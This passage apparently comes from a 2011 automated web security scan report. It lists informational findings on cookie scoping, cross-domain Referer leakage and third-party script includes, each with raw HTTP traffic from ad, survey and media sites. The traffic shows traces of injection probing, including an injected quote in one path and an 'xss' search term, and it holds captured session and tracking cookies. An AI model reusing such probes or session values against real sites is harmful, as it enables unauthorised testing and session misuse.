Cookie: uid=32c961cd-226e-4e58-a3bf-a49df64f43b3; segments_p1="eJzjYuFY1sjMxcIx9w8zFzPH+jwgc+EdRiC5/zWI3A0mj31nAkquBUl2doBU7wAL991n5uLkeBAucGfO4c8sQIHe40xA8sx7kOSt7SCRSUCSmeN5LpC5CaiHk2N6gMCvu21fQHIb14PI02DVt8Gq94GN/fIBRO78CCInAsU5Oe5HCzz/8eYzyKh/HEDRoxBXvWYEACqCOLA="; exchange_uid=eyIyIjogWyIyMjMwNjE2MjU1NTY5NzE1ODc3IiwgNzM0Mzg3XSwgIjQiOiBbIkNBRVNFRGxwczBXRFF6TF9zR0NPQ2RlekdZTSIsIDczNDM4NV19; uid=776b70d9-5df4-4d1b-98af-982dd1709cac; subID="{}"; impressions="{\"726143\": [1312827315+ \"01026648-7049-425e-a7ce-9a7cb258a341\"+ 70243+ 29835+ 1365]+ \"778530\": [1312501863+ \"7260679259817030178\"+ 162013+ 105345+ 12332]}"; camp_freq_p1="eJzjkuH4dZZZgFFi8/mGTywKjBrvQbQBowWYzyXCca2PHSj7/MGbjywKDBoMBgwWDAD8gxIK"; io_freq_p1="eJzjEuZY5SzAKLH5fMMnFgNGCzDNJczRmgEUfP7gzUcWBQYNBgMGCwYAJnoNKA=="; dp_rec="{\"2\": 1312827317+ \"4\": 1312827314}"; partnerUID="eyIxMTUiOiBbIjRlMzcxMDQ0MzJmZTExNDgiLCB0cnVlXSwgIjE5OSI6IFsiQkI0MEFFQTI5RUFFQjNGMDBCOTI1ODkzOUZDMEQ3RjMiLCB0cnVlXSwgIjE2OSI6IFsiNGUzNzEwNDQzMmZlMTE0OCIsIHRydWVdLCAiODQiOiBbIkVhemJWWUdKOTk5cjZZa20iLCB0cnVlXX0="; conversions="{\"70914\": 1315307386+ \"61326\": 1315307639}"

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sat, 17 Sep 2011 14:44:03 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Sat, 17-Sep-2011 14:43:43 GMT
Content-Type: image/gif
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: partnerUID="eyIxMTUiOiBbIjRlMzcxMDQ0MzJmZTExNDgiLCB0cnVlXSwgIjE5OSI6IFsiQkI0MEFFQTI5RUFFQjNGMDBCOTI1ODkzOUZDMEQ3RjMiLCB0cnVlXSwgIjE2OSI6IFsiNGUzNzEwNDQzMmZlMTE0OCIsIHRydWVdLCAiODQiOiBbIkVhemJWWUdKOTk5cjZZa20iLCB0cnVlXX0="; Domain=invitemedia.com; expires=Sun, 16-Sep-2012 14:44:03 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

14.18. http://segs.btrll.com/v1/tpix/-/-/-/-/-/sid.6543418%22%20height=%221%22%20width=%221  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segs.btrll.com
Path:   /v1/tpix/-/-/-/-/-/sid.6543418%22%20height=%221%22%20width=%221

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v1/tpix/-/-/-/-/-/sid.6543418%22%20height=%221%22%20width=%221 HTTP/1.1
Host: segs.btrll.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://answerology.delish.com/index.aspx
Cookie: BR_MBBV=Ak5Bsatsr1Z1AeV1e6w; DRN1=AGPX0VIEGKsAY9g6Ttf0Bw

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 14:31:31 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: BR_MBBV=Ak5Bsatsr1Z1AeV1e6w; expires=Sat, 15-Sep-2012 14:31:31 GMT; path=/; domain=.btrll.com
Expires: Tues, 01 Jan 1980 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: DRN1=AGPX0VIEGKsAY9g6TutWQw; expires=Mon, 16-Sep-2013 14:31:31 GMT; path=/; domain=.btrll.com
Location: http://cache.btrll.com/default/Pix-1x1.gif
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


14.19. http://webmedia.oreck.com/cookE/geoip/iframe  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://webmedia.oreck.com
Path:   /cookE/geoip/iframe

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cookE/geoip/iframe?spacedesc=2112034_1113699_180x150_2037848_2112034&target=_blank&@CPSC@=http://clk.atdmt.com/go/msnnkdrv0010001658apm/direct;wi.180;hi.150;01;ai.234564869.234602079;ct.1/01?href= HTTP/1.1
Host: webmedia.oreck.com
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=CP49AO&cb=404881879
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 13:06:31 GMT
Server: Apache
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://webmedia.oreck.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Set-Cookie: PrefID=11-676885560; expires=Tue, 17 Sep 2013 01:06:31 GMT; path=/; domain=.oreck.com
Set-Cookie: CSList=1088660/1113699,1088660/1113699,0/0,0/0,0/0; expires=Fri, 16 Dec 2011 13:06:31 GMT; path=/; domain=.oreck.com
x_transtrans: 14.6.10.688
Content-Type: text/html
Content-Length: 5290
Connection: close


<SCRIPT LANGUAGE="JavaScript">

function Measure_this(EV)
{
var img = new Image();
img.src = "http://webmedia.oreck.com/image_htmlping?spacedesc=2112034_1113699_180x150_2037848_2112034&af=1119611
...[SNIP]...

15. Cross-domain Referer leakage  previous  next
There are 4 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


15.1. http://amch.questionmarket.com/adscgen/d_layer.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/d_layer.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adscgen/d_layer.php?sub=amch&type=d_layer&survey_num=913131&site=10&code=922738&p=1&protocol=http&lang=&auto_ctl_invite=0&noiframe=1&loc=aHR0cDovL3d3dy5kZWxpc2guY29tL3NlYXJjaC9mYXN0X3NlYXJjaF9yZWNpcGVzP3NlYXJjaF90ZXJtPXhzcytzdWdhcitjYWtlJg== HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.delish.com/search/fast_search_recipes?search_term=xss+sugar+cake&
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1; LP=1316270041

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:37:42 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b203.dl
Content-Type: text/html
Content-Length: 13907

var DL_HideSelects = true;
var DL_HideObjects = false;
var DL_HideIframes = false;
var DL_Banner; // Will be bound to the DIV element representing the layer
var DL_ScrollState = 0;
var DL_width;
var D
...[SNIP]...
_InsertSwf() {
   if (DL_FlashInstalled()) {    // Make sure the browser can handle Flash.
       // Inside the DIV tag: the object. Outside: nothing; Flash handles its own click events.
       DL_InsertObject('', '<OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=3,0,0,0" WIDTH="'+DL_ImgWidth+'" HEIGHT="'+DL_ImgHeight+'" id="DL_object"><PARAM NAME=movie VALUE="http://amch.questionmarket.com/static/msn_li-250x276-3l-eng-nul.swf?clickTag=JAVASCRIPT:DL_GotoSurvey();&clickTag2=JAVASCRIPT:DL_Close();">
...[SNIP]...

15.2. http://img.mediaplex.com/content/0/14741/120372/GX1041_AugBanner_728x90.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/14741/120372/GX1041_AugBanner_728x90.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /content/0/14741/120372/GX1041_AugBanner_728x90.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14741-120372-2060-51%3Fmpt%3D9243697&mpt=9243697&mpvc=http://clk.atdmt.com/go/352572792/direct;ai.236393308.233540406;ct.1/01?href= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/APM/iview/352572792/direct;/01?click=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT; __qca=P0-2105999177-1315520268755; __utma=183366586.499222152.1315520229.1315520229.1315520229.1; __utmz=183366586.1315520229.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=mediaplex

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 12:51:49 GMT
Server: Apache
Last-Modified: Tue, 16 Aug 2011 19:18:59 GMT
ETag: "5d7df9-115a-4aaa4406baec0"
Accept-Ranges: bytes
Content-Length: 5083
Content-Type: text/html; charset=ISO-8859-1

<html>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<noscript><a href="http://clk.atdmt.com/go/352572792/direct;ai.236393308.233540406;ct.1/01?href=http://altfarm.mediaplex.com/ad/ck/14741-120372-2060-51?mpt=9243697" target="_blank"><img src="http://img-cdn.mediaplex.com/0/14741/120372/GX1041_AugBanner_728x90.jpg" width="728" height="90" border="0">
...[SNIP]...

15.3. http://survey.questionmarket.com/surv/925590/newai.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://survey.questionmarket.com
Path:   /surv/925590/newai.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /surv/925590/newai.php?ai_id=326080549&site=5&from_aicode=922738&continue_to=&yob=12&age=99&country=38&dq_history=913131,10&tmplt= HTTP/1.1
Host: survey.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://survey.questionmarket.com/surv/913131/newai.php
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1; LP=1316270054; NSC_tvswfz-iuuq=4458360f3660; veranda_sess=survey_num%3D913131%2Cmember_id%3D326080549%2Cfrom_site%3D10%2Cfrom_aicode%3D922738%2Ctime%3D1316270056; PHPSESSID=959bcd26e14b9626e1332081ccc6c315; ST=913131_

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:41:24 GMT
Server: Apache
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Pragma: no-cache
Expires: -1
Last-Modified: Sat, 17 Sep 2011 14:41:24 GMT
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Vary: Accept-Encoding
Content-Length: 7609
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_tvswfz-iuuq=4458360f3660;Version=1;Max-Age=1200;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<td height="90" width="192"><a href=http://www.dynamiclogic.com target=_blank><img
       src=http://amch.questionmarket.com/images/survey/dl_default/dllogo.gif
       border=0 width=261 height=74 class="dl_main_logo">
...[SNIP]...
<foot>.. 1999-2011 <a href="http://www.dynamiclogic.com" target="_blank">Dynamic Logic Inc.</a> - <a href="http://www.millwardbrown.com" target="_blank">A Millward Brown Company.</a>
...[SNIP]...

15.4. http://www.peopleschoice.com/pca/polls/poll.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.peopleschoice.com
Path:   /pca/polls/poll.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pca/polls/poll.jsp?pollId=1000000270 HTTP/1.1
Host: www.peopleschoice.com
Proxy-Connection: keep-alive
Referer: http://wonderwall.msn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 13:09:44 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
X-Powered-By: JSF/1.2
Content-Type: text/html;charset=UTF-8
Via: 1.1 pca-www-01.sparkred.com
Vary: Accept-Encoding
Content-Length: 27072
Connection: close

<!DOCTYPE composition PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebo
...[SNIP]...
<link class="component" href="/pca/a4j/s/3_3_3.Final/org/richfaces/skin.xcss/DATB/eAF7sqpgb-jyGdIAFrMEaw__" rel="stylesheet" type="text/css" /><script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
   <script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/jqueryui/1.8.5/jquery-ui.min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="//ad.afy11.net/srad.js?azId=2000000523507">
</script>
...[SNIP]...
<div name="1000000270" class="pca-share-chicklets share-1000000270"><a href="http://www.facebook.com/sharer.php" onclick="window.open('http://www.facebook.com/sharer.php?u=http://' + location.hostname + '/pca/polls/poll.jsp?pollId=1000000270&amp;t='+encodeURIComponent('&lt;i&gt;Mad Men&lt;/i&gt; star January Jones has welcomed a baby boy. Which of her film projects is your favorite?'),'facebook','toolbar=no,width=626,height=436'); return false;"><img src="http://static.ak.fbcdn.net/images/share/facebook_share_icon.gif?1%3A26981" alt="Facebook" /></a>
               &nbsp;&nbsp;<a href="http://delicious.com/save" onclick="window.open('http://delicious.com/save?v=5&amp;noui&amp;jump=close&amp;url='+encodeURIComponent('http://' + location.hostname + '/pca/polls/poll.jsp?pollId=1000000270')+'&amp;title='+encodeURIComponent(document.title), 'delicious','toolbar=no,width=550,height=550'); return false;"><img src="http://static.delicious.com/img/delicious.small.gif" alt="Delicious" /></a>
               &nbsp;&nbsp;<a href="http://www.stumbleupon.com/submit?url=http%3A//www.peopleschoice.com/pca/polls/poll.jsp%3FpollId=1000000270&title=%3Ci%3EMad%20Men%3C/i%3E%20star%20January%20Jones%20has%20welcomed%20a%20baby%20boy.%20%20Which%20of%20her%20film%20projects%20is%20your%20favorite%3F"><img src="http://cdn.stumble-upon.com/images/16x16_su_solid.gif" alt="Stumble Upon" /></a>
               &nbsp;&nbsp;<a href="http://digg.com/submit?url=http%3A//www.peopleschoice.com/pca/polls/poll.jsp%3FpollId=1000000270&title=%3Ci%3EMad%20Men%3C/i%3E%20star%20January%20Jones%20has%20welcomed%20a%20baby%20boy.%20%20Which%20of%20her%20film%20projects%20is%20your%20favorite%3F"><img src="http://digg.com/img/badges/16x16-digg-guy.gif" alt="Digg!" /></a>
...[SNIP]...
</script>
<script type="text/javascript" src="//ad.afy11.net/srad.js?azId=2000000523907">
</script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</span>
       <a href="http://show.custhelp.com/cgi-bin/show.cfg/php/enduser/std_alp.php?p_pv=1.634&amp;p_prods=634&amp;prod_lvl1=634">FAQs &amp; Contact Us</a>
...[SNIP]...
</div>

<script src="//www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="//connect.facebook.net/en_US/all.js"></script>
...[SNIP]...

16. Cross-domain script include  previous  next
There are 8 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


16.1. http://blekko.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blekko.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: blekko.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v=3; t=1316220316418

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 14:51:21 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=15
Set-Cookie: fbl=2; path=/; expires=Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, max-age=0
Expires: -1
Pragma: no-cache
Content-Length: 12861
X-Blekko-PT: 9b2bde8b7ce325b96f747dacb8e57f8a

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<!-- NAV BOTTOM END-->
<script type="text/javascript" src="http://a.blekko-img.com/045/gz/c39f376862ddf44f_blekko20.js"></script>
...[SNIP]...

16.2. http://blekko.com/ws/wpp+companies  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blekko.com
Path:   /ws/wpp+companies

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /ws/wpp+companies HTTP/1.1
Host: blekko.com
Proxy-Connection: keep-alive
Referer: http://blekko.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v=3; t=1316288660893

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 14:51:33 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=15
Set-Cookie: fbl=2; path=/; expires=Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, max-age=0
Expires: -1
Pragma: no-cache
Content-Length: 60774
X-Blekko-QF: bhq
X-Blekko-PT: 9e3ded066a4f3c06061fc5f1cedfe443

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
</div>
<script type="text/javascript" src="http://a.blekko-img.com/045/gz/c39f376862ddf44f_blekko20.js"></script>
...[SNIP]...

16.3. http://en.wikipedia.org/wiki/Chromium  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://en.wikipedia.org
Path:   /wiki/Chromium

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /wiki/Chromium HTTP/1.1
Host: en.wikipedia.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 06:28:51 GMT
Server: Apache
Cache-Control: private, s-maxage=0, max-age=0, must-revalidate
Content-Language: en
Vary: Accept-Encoding,Cookie
Last-Modified: Fri, 16 Sep 2011 02:13:25 GMT
Content-Length: 262407
Content-Type: text/html; charset=UTF-8
Age: 22558
X-Cache: HIT from sq60.wikimedia.org
X-Cache-Lookup: HIT from sq60.wikimedia.org:3128
X-Cache: MISS from sq59.wikimedia.org
X-Cache-Lookup: MISS from sq59.wikimedia.org:80
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" dir="ltr" xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>
...[SNIP]...
</style>
<script src="http://bits.wikimedia.org/en.wikipedia.org/load.php?debug=false&amp;lang=en&amp;modules=startup&amp;only=scripts&amp;skin=vector" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://bits.wikimedia.org/en.wikipedia.org/load.php?debug=false&amp;lang=en&amp;modules=site&amp;only=scripts&amp;skin=vector" type="text/javascript"></script>
...[SNIP]...
</script><script type="text/javascript" src="//geoiplookup.wikimedia.org/"></script>
...[SNIP]...

16.4. http://en.wikipedia.org/wiki/List_of_country_calling_codes  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://en.wikipedia.org
Path:   /wiki/List_of_country_calling_codes

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /wiki/List_of_country_calling_codes HTTP/1.1
Host: en.wikipedia.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 06:42:42 GMT
Server: Apache
Cache-Control: private, s-maxage=0, max-age=0, must-revalidate
Content-Language: en
Vary: Accept-Encoding,Cookie
Last-Modified: Sat, 17 Sep 2011 02:32:10 GMT
Content-Length: 384004
Content-Type: text/html; charset=UTF-8
Age: 21728
X-Cache: HIT from sq60.wikimedia.org
X-Cache-Lookup: HIT from sq60.wikimedia.org:3128
X-Cache: MISS from sq60.wikimedia.org
X-Cache-Lookup: MISS from sq60.wikimedia.org:80
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" dir="ltr" xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>
...[SNIP]...
</style>
<script src="http://bits.wikimedia.org/en.wikipedia.org/load.php?debug=false&amp;lang=en&amp;modules=startup&amp;only=scripts&amp;skin=vector" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://bits.wikimedia.org/en.wikipedia.org/load.php?debug=false&amp;lang=en&amp;modules=site&amp;only=scripts&amp;skin=vector" type="text/javascript"></script>
...[SNIP]...
</script><script type="text/javascript" src="//geoiplookup.wikimedia.org/"></script>
...[SNIP]...

16.5. http://www.peopleschoice.com/pca/polls/poll.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.peopleschoice.com
Path:   /pca/polls/poll.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pca/polls/poll.jsp?pollId=1000000270 HTTP/1.1
Host: www.peopleschoice.com
Proxy-Connection: keep-alive
Referer: http://wonderwall.msn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 13:09:44 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
X-Powered-By: JSF/1.2
Content-Type: text/html;charset=UTF-8
Via: 1.1 pca-www-01.sparkred.com
Vary: Accept-Encoding
Content-Length: 27072
Connection: close

<!DOCTYPE composition PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebo
...[SNIP]...
<link class="component" href="/pca/a4j/s/3_3_3.Final/org/richfaces/skin.xcss/DATB/eAF7sqpgb-jyGdIAFrMEaw__" rel="stylesheet" type="text/css" /><script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
   <script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/jqueryui/1.8.5/jquery-ui.min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="//ad.afy11.net/srad.js?azId=2000000523507">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="//ad.afy11.net/srad.js?azId=2000000523907">
</script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</div>

<script src="//www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="//connect.facebook.net/en_US/all.js"></script>
...[SNIP]...

16.6. http://www.peopleschoice.com/pca/vote/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.peopleschoice.com
Path:   /pca/vote/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pca/vote/ HTTP/1.1
Host: www.peopleschoice.com
Proxy-Connection: keep-alive
Referer: http://www.peopleschoice.com/pca/polls/poll.jsp?pollId=1000000270
